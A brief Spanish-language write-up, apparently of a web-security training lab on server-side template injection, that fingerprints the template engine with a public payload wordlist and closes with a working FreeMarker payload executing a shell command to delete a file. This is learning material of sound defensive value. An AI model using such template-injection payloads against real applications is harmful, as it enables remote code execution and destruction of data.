3 - Server-side template injection using documentation

Tenemos que detectar ante que sistema de plantillas estamos

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server Side Template Injection

Usamos la wordlist de PayloadAllTheThings para detectar que sistema de plantillas se está usando, lo pasamos al intruder :

El payload #{3*3} funciona, podría ser Slim o Haml (ruby)
El payload ${7*7} también.

Es freemarker :

${"freemarker.template.utility.Execute"?new()("rm+/home/carlos/morale.txt")}